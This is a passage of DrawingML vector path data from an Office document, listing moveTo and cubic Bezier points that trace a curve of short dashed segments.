                  <a:moveTo>
                    <a:pt x="23" y="1249"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1242"/>
                    <a:pt x="21" y="1235"/>
                    <a:pt x="20" y="1229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1227"/>
                    <a:pt x="18" y="1225"/>
                    <a:pt x="16" y="1225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1226"/>
                    <a:pt x="12" y="1228"/>
                    <a:pt x="12" y="1230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1237"/>
                    <a:pt x="14" y="1243"/>
                    <a:pt x="15" y="1250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1252"/>
                    <a:pt x="18" y="1254"/>
                    <a:pt x="20" y="1253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1253"/>
                    <a:pt x="24" y="1251"/>
                    <a:pt x="23" y="1249"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="31" y="1288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1281"/>
                    <a:pt x="28" y="1275"/>
                    <a:pt x="27" y="1268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="1266"/>
                    <a:pt x="24" y="1265"/>
                    <a:pt x="22" y="1265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1265"/>
                    <a:pt x="19" y="1267"/>
                    <a:pt x="19" y="1270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1276"/>
                    <a:pt x="22" y="1283"/>
                    <a:pt x="23" y="1289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="1292"/>
                    <a:pt x="26" y="1293"/>
                    <a:pt x="28" y="1292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1292"/>
                    <a:pt x="31" y="1290"/>
                    <a:pt x="31" y="1288"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="40" y="1327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1320"/>
                    <a:pt x="37" y="1314"/>
                    <a:pt x="35" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="1305"/>
                    <a:pt x="32" y="1304"/>
                    <a:pt x="30" y="1304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1305"/>
                    <a:pt x="27" y="1307"/>
                    <a:pt x="27" y="1309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1316"/>
                    <a:pt x="30" y="1322"/>
                    <a:pt x="32" y="1329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="1331"/>
                    <a:pt x="35" y="1332"/>
                    <a:pt x="37" y="1331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="1331"/>
                    <a:pt x="40" y="1329"/>
                    <a:pt x="40" y="1327"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="1365"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="1359"/>
                    <a:pt x="46" y="1352"/>
                    <a:pt x="45" y="1346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="1344"/>
                    <a:pt x="42" y="1343"/>
                    <a:pt x="40" y="1343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1344"/>
                    <a:pt x="36" y="1346"/>
                    <a:pt x="37" y="1348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="1354"/>
                    <a:pt x="41" y="1361"/>
                    <a:pt x="42" y="1367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="1369"/>
                    <a:pt x="45" y="1371"/>
                    <a:pt x="47" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="1369"/>
                    <a:pt x="51" y="1367"/>
                    <a:pt x="50" y="1365"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="62" y="1403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="1397"/>
                    <a:pt x="58" y="1391"/>
                    <a:pt x="56" y="1384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1382"/>
                    <a:pt x="53" y="1381"/>
                    <a:pt x="51" y="1382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="1382"/>
                    <a:pt x="48" y="1385"/>
                    <a:pt x="48" y="1387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1393"/>
                    <a:pt x="52" y="1399"/>
                    <a:pt x="54" y="1406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1408"/>
                    <a:pt x="57" y="1409"/>
                    <a:pt x="59" y="1408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="1408"/>
                    <a:pt x="63" y="1405"/>
                    <a:pt x="62" y="1403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="1441"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="1435"/>
                    <a:pt x="71" y="1428"/>
                    <a:pt x="68" y="1422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1420"/>
                    <a:pt x="65" y="1419"/>
                    <a:pt x="63" y="1420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="1420"/>
                    <a:pt x="60" y="1423"/>
                    <a:pt x="61" y="1425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="1431"/>
                    <a:pt x="65" y="1437"/>
                    <a:pt x="68" y="1444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1446"/>
                    <a:pt x="71" y="1447"/>
                    <a:pt x="73" y="1446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1445"/>
                    <a:pt x="76" y="1443"/>
                    <a:pt x="75" y="1441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1441"/>
                    <a:pt x="75" y="1441"/>
                    <a:pt x="75" y="1441"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="90" y="1478"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="1472"/>
                    <a:pt x="85" y="1466"/>
                    <a:pt x="82" y="1459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="1457"/>
                    <a:pt x="79" y="1456"/>
                    <a:pt x="77" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1458"/>
                    <a:pt x="74" y="1460"/>
                    <a:pt x="75" y="1462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="1469"/>
                    <a:pt x="80" y="1475"/>
                    <a:pt x="82" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="1483"/>
                    <a:pt x="86" y="1484"/>
                    <a:pt x="88" y="1483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1482"/>
                    <a:pt x="91" y="1480"/>
                    <a:pt x="90" y="1478"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="106" y="1514"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="1508"/>
                    <a:pt x="100" y="1502"/>
                    <a:pt x="98" y="1496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="1494"/>
                    <a:pt x="94" y="1493"/>
                    <a:pt x="92" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1495"/>
                    <a:pt x="89" y="1497"/>
                    <a:pt x="90" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="1506"/>
                    <a:pt x="96" y="1512"/>
                    <a:pt x="99" y="1518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="1520"/>
                    <a:pt x="102" y="1521"/>
                    <a:pt x="104" y="1520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1519"/>
                    <a:pt x="107" y="1516"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1514"/>
                    <a:pt x="106" y="1514"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="1550"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="1544"/>
                    <a:pt x="117" y="1538"/>
                    <a:pt x="114" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="1530"/>
                    <a:pt x="111" y="1529"/>
                    <a:pt x="109" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="1531"/>
                    <a:pt x="106" y="1534"/>
                    <a:pt x="107" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="1542"/>
                    <a:pt x="113" y="1548"/>
                    <a:pt x="116" y="1554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="1556"/>
                    <a:pt x="120" y="1556"/>
                    <a:pt x="122" y="1555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="1554"/>
                    <a:pt x="124" y="1552"/>
                    <a:pt x="123" y="1550"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="1585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="1579"/>
                    <a:pt x="136" y="1574"/>
                    <a:pt x="132" y="1568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="1566"/>
                    <a:pt x="129" y="1565"/>
                    <a:pt x="127" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="1567"/>
                    <a:pt x="124" y="1570"/>
                    <a:pt x="125" y="1571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="1577"/>
                    <a:pt x="132" y="1583"/>
                    <a:pt x="135" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="1591"/>
                    <a:pt x="139" y="1592"/>
                    <a:pt x="140" y="1591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1590"/>
                    <a:pt x="143" y="1587"/>
                    <a:pt x="142" y="1585"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="1620"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="1614"/>
                    <a:pt x="155" y="1608"/>
                    <a:pt x="152" y="1602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="1601"/>
                    <a:pt x="148" y="1600"/>
                    <a:pt x="146" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="1602"/>
                    <a:pt x="144" y="1605"/>
                    <a:pt x="145" y="1606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="1612"/>
                    <a:pt x="152" y="1618"/>
                    <a:pt x="155" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="1626"/>
                    <a:pt x="159" y="1626"/>
                    <a:pt x="161" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="1624"/>
                    <a:pt x="163" y="1621"/>
                    <a:pt x="162" y="1620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="1620"/>
                    <a:pt x="162" y="1620"/>
                    <a:pt x="162" y="1620"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="1653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="1648"/>
                    <a:pt x="176" y="1642"/>
                    <a:pt x="173" y="1636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="1635"/>
                    <a:pt x="169" y="1634"/>
                    <a:pt x="167" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="1636"/>
                    <a:pt x="165" y="1639"/>
                    <a:pt x="166" y="1641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="1646"/>
                    <a:pt x="173" y="1652"/>
                    <a:pt x="177" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="1659"/>
                    <a:pt x="180" y="1660"/>
                    <a:pt x="182" y="1659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="1658"/>
                    <a:pt x="185" y="1655"/>
                    <a:pt x="183" y="1653"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="1686"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1681"/>
                    <a:pt x="198" y="1675"/>
                    <a:pt x="195" y="1670"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="1668"/>
                    <a:pt x="191" y="1667"/>
                    <a:pt x="189" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="1670"/>
                    <a:pt x="187" y="1672"/>
                    <a:pt x="188" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="1680"/>
                    <a:pt x="196" y="1685"/>
                    <a:pt x="199" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1692"/>
                    <a:pt x="203" y="1693"/>
                    <a:pt x="205" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="1690"/>
                    <a:pt x="207" y="1688"/>
                    <a:pt x="206" y="1686"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="1718"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="1713"/>
                    <a:pt x="222" y="1707"/>
                    <a:pt x="218" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="1700"/>
                    <a:pt x="214" y="1700"/>
                    <a:pt x="212" y="1701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="1703"/>
                    <a:pt x="210" y="1705"/>
                    <a:pt x="211" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="1712"/>
                    <a:pt x="219" y="1718"/>
                    <a:pt x="223" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="1725"/>
                    <a:pt x="227" y="1725"/>
                    <a:pt x="229" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="1722"/>
                    <a:pt x="231" y="1720"/>
                    <a:pt x="230" y="1718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="1718"/>
                    <a:pt x="230" y="1718"/>
                    <a:pt x="230" y="1718"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="1749"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="1744"/>
                    <a:pt x="246" y="1739"/>
                    <a:pt x="242" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="1732"/>
                    <a:pt x="238" y="1732"/>
                    <a:pt x="237" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="1734"/>
                    <a:pt x="235" y="1737"/>
                    <a:pt x="236" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1744"/>
                    <a:pt x="244" y="1749"/>
                    <a:pt x="249" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1756"/>
                    <a:pt x="253" y="1756"/>
                    <a:pt x="254" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="1753"/>
                    <a:pt x="256" y="1751"/>
                    <a:pt x="255" y="1749"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="1779"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="1774"/>
                    <a:pt x="272" y="1769"/>
                    <a:pt x="268" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1763"/>
                    <a:pt x="264" y="1762"/>
                    <a:pt x="262" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="1765"/>
                    <a:pt x="260" y="1768"/>
                    <a:pt x="262" y="1769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1774"/>
                    <a:pt x="271" y="1780"/>
                    <a:pt x="275" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="1786"/>
                    <a:pt x="279" y="1786"/>
                    <a:pt x="281" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1783"/>
                    <a:pt x="282" y="1781"/>
                    <a:pt x="281" y="1779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="1779"/>
                    <a:pt x="281" y="1779"/>
                    <a:pt x="281" y="1779"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="1808"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1803"/>
                    <a:pt x="299" y="1799"/>
                    <a:pt x="294" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1792"/>
                    <a:pt x="290" y="1792"/>
                    <a:pt x="289" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="1795"/>
                    <a:pt x="287" y="1798"/>
                    <a:pt x="289" y="1799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1804"/>
                    <a:pt x="298" y="1809"/>
                    <a:pt x="302" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1815"/>
                    <a:pt x="307" y="1815"/>
                    <a:pt x="308" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="1812"/>
                    <a:pt x="310" y="1810"/>
                    <a:pt x="308" y="1808"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="1836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="1832"/>
                    <a:pt x="327" y="1827"/>
                    <a:pt x="322" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1821"/>
                    <a:pt x="318" y="1821"/>
                    <a:pt x="317" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="1824"/>
                    <a:pt x="315" y="1827"/>
                    <a:pt x="317" y="1828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1833"/>
                    <a:pt x="326" y="1837"/>
                    <a:pt x="331" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="1844"/>
                    <a:pt x="335" y="1844"/>
                    <a:pt x="337" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="1840"/>
                    <a:pt x="338" y="1838"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="1836"/>
                    <a:pt x="337" y="1836"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="1863"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="1859"/>
                    <a:pt x="356" y="1854"/>
                    <a:pt x="351" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="1848"/>
                    <a:pt x="347" y="1849"/>
                    <a:pt x="345" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="1852"/>
                    <a:pt x="344" y="1854"/>
                    <a:pt x="346" y="1856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="1860"/>
                    <a:pt x="356" y="1865"/>
                    <a:pt x="361" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="1871"/>
                    <a:pt x="365" y="1871"/>
                    <a:pt x="366" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="1867"/>
                    <a:pt x="368" y="1865"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="1889"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="1885"/>
                    <a:pt x="386" y="1881"/>
                    <a:pt x="381" y="1876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="1875"/>
                    <a:pt x="377" y="1875"/>
                    <a:pt x="375" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="1879"/>
                    <a:pt x="374" y="1881"/>
                    <a:pt x="376" y="1883"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="1887"/>
                    <a:pt x="386" y="1891"/>
                    <a:pt x="391" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="1897"/>
                    <a:pt x="395" y="1897"/>
                    <a:pt x="397" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="1893"/>
                    <a:pt x="398" y="1891"/>
                    <a:pt x="396" y="1889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="1889"/>
                    <a:pt x="396" y="1889"/>
                    <a:pt x="396" y="1889"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="1914"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="422" y="1910"/>
                    <a:pt x="417" y="1906"/>
                    <a:pt x="412" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1900"/>
                    <a:pt x="408" y="1901"/>
                    <a:pt x="406" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="1904"/>
                    <a:pt x="405" y="1907"/>
                    <a:pt x="407" y="1908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="1912"/>
                    <a:pt x="417" y="1916"/>
                    <a:pt x="423" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="1922"/>
                    <a:pt x="427" y="1921"/>
                    <a:pt x="428" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="1918"/>
                    <a:pt x="429" y="1915"/>
                    <a:pt x="428" y="1914"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="1938"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="1934"/>
                    <a:pt x="449" y="1930"/>
                    <a:pt x="444" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="1925"/>
                    <a:pt x="439" y="1925"/>
                    <a:pt x="438" y="1927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="1929"/>
                    <a:pt x="437" y="1931"/>
                    <a:pt x="439" y="1932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="444" y="1936"/>
                    <a:pt x="450" y="1940"/>
                    <a:pt x="455" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1945"/>
                    <a:pt x="460" y="1945"/>
                    <a:pt x="461" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="1941"/>
                    <a:pt x="462" y="1939"/>
                    <a:pt x="460" y="1938"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="1960"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="1956"/>
                    <a:pt x="482" y="1953"/>
                    <a:pt x="476" y="1949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474" y="1948"/>
                    <a:pt x="472" y="1948"/>
                    <a:pt x="471" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="1952"/>
                    <a:pt x="470" y="1954"/>
                    <a:pt x="472" y="1956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="1959"/>
                    <a:pt x="483" y="1963"/>
                    <a:pt x="489" y="1967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="490" y="1968"/>
                    <a:pt x="493" y="1967"/>
                    <a:pt x="494" y="1965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="1964"/>
                    <a:pt x="495" y="1961"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="1981"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="1978"/>
                    <a:pt x="515" y="1974"/>
                    <a:pt x="510" y="1971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1969"/>
                    <a:pt x="505" y="1970"/>
                    <a:pt x="504" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1974"/>
                    <a:pt x="504" y="1976"/>
                    <a:pt x="506" y="1977"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="1981"/>
                    <a:pt x="517" y="1984"/>
                    <a:pt x="523" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1989"/>
                    <a:pt x="527" y="1988"/>
                    <a:pt x="528" y="1986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529" y="1985"/>
                    <a:pt x="529" y="1982"/>
                    <a:pt x="527" y="1981"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527" y="1981"/>
                    <a:pt x="527" y="1981"/>
                    <a:pt x="527" y="1981"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="562" y="2001"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="1998"/>
                    <a:pt x="550" y="1994"/>
                    <a:pt x="544" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="542" y="1990"/>
                    <a:pt x="540" y="1991"/>
                    <a:pt x="539" y="1993"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="538" y="1994"/>
                    <a:pt x="538" y="1997"/>
                    <a:pt x="540" y="1998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="2001"/>
                    <a:pt x="552" y="2005"/>
                    <a:pt x="558" y="2008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="2009"/>
                    <a:pt x="562" y="2008"/>
                    <a:pt x="563" y="2006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="2004"/>
                    <a:pt x="564" y="2002"/>
                    <a:pt x="562" y="2001"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="562" y="2001"/>
                    <a:pt x="562" y="2001"/>
                    <a:pt x="562" y="2001"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="597" y="2019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="2016"/>
                    <a:pt x="585" y="2013"/>
                    <a:pt x="579" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577" y="2009"/>
                    <a:pt x="575" y="2010"/>
                    <a:pt x="574" y="2012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="2014"/>
                    <a:pt x="574" y="2016"/>
                    <a:pt x="576" y="2017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="582" y="2020"/>
                    <a:pt x="588" y="2023"/>
                    <a:pt x="594" y="2026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="2027"/>
                    <a:pt x="598" y="2027"/>
                    <a:pt x="599" y="2025"/>
